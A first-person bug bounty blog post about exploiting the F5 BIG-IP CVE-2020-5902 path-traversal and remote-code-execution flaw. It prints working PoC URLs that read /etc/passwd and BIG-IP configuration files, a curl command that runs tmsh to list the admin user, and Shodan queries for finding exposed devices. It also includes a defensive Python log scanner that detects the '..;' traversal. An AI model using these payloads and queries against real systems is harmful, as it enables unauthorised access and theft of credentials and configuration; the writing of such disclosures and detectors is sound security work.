How I found 10 Remote Code Executions in 10 minutes (CVE-2020-5902)

Today I am going to talk about the F5 BIG-IP vulnerability that was disclosed recently. On the 4th of July I saw this tweet on Twitter.

But I didn't find any PoC for this zero-day. So, as a noob bug bounty hunter, I just ignored it and thought I wouldn't be able to exploit it :(.

So the next day I woke up and saw the feeds on Twitter. And I saw this meme

and after a few minutes

and I was like

So I immediately started looking for a PoC and I found a couple of them.

For Directory Traversal

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

For Remote Code Execution

curl -v -k  'https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
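From the defender's side, the same `..;` path segment that the PoCs above rely on is what to look for in the web server's access log. The following is an added example, not code from the original post or from F5: it scans constructed sample log lines (combined-log shape) and flags requests whose decoded path carries a `..;` segment, going slightly beyond the post by also catching the percent-encoded form (`..%3B`), which a plain text search for `..;` would miss because Apache logs the raw request line.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post); the
# request paths mirror the PoC pattern shown above.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1532
203.0.113.7 - - [05/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 2048
203.0.113.7 - - [05/Jul/2020:10:01:09 +0000] "GET /tmui/login.jsp/..%3B/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 900
198.51.100.2 - - [05/Jul/2020:10:02:00 +0000] "GET /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 401 0
"""

# client, method, request target and status from a combined-style log line
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Workspace endpoints named in the public PoCs for this CVE.
WORKSPACE_ENDPOINTS = ("fileRead.jsp", "tmshCmd.jsp")

def decode_target(target):
    """Percent-decode until stable, so single and double encoding both normalise."""
    previous = None
    while previous != target:
        previous, target = target, unquote(target)
    return target

def is_traversal_attempt(target):
    """True when the path holds a '..;' segment: Apache sees a plain '..;'
    directory name, Tomcat strips ';...' as a path parameter and steps up a
    directory, which is the normalisation mismatch behind CVE-2020-5902."""
    path = decode_target(target).split("?", 1)[0]
    return "..;" in path

def scan_log(text):
    """Return one finding per log line that carries the traversal segment."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not is_traversal_attempt(m.group("target")):
            continue
        path = decode_target(m.group("target")).split("?", 1)[0]
        endpoint = path.rsplit("/", 1)[-1]
        findings.append({
            "client": m.group("client"),
            "endpoint": endpoint,
            "hits_workspace": "/tmui/locallb/workspace/" in path and endpoint in WORKSPACE_ENDPOINTS,
            "status": int(m.group("status")),
        })
    return findings
```

A 200 status on a flagged line means the bypass reached the endpoint; the last sample line shows a direct workspace request without the traversal, which is correctly left unflagged (it was refused with 401).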

Now, to find domains vulnerable to this F5 BIG-IP bug, I used this query on shodan.io:

title:"BIG-IP&reg;- Redirect"

If you want to check whether your organization is vulnerable to this or not, use this query:

title:"BIG-IP&reg;- Redirect" org:<yourorgname>

When I searched for the query, it turned out there were 8.4k results in total!

So I looked for orgs that had a bug bounty program and found a total of 10 domains that were vulnerable to this CVE. I made a PoC and reported all of them. I was so happy at that time because I had never found an RCE before, and I was reporting not 1 but 10!

After 4 hours I checked my profile and all of my submissions were duplicates.

I felt very bad for a few minutes, because in bug bounty there is no room for the second person: another researcher had reported the bug a day before me.

But still, all I know is that it was one hell of an amazing ride, the moment when I found those RCEs with only a single command. :)

Takeaway -> Always try to keep yourself updated on Twitter, because most of the infosec community is there.

By the time this blog gets published there will be many automated scanners available on GitHub to find this CVE, so don't forget to check them out.

It is my first blog, so thank you for reading :)
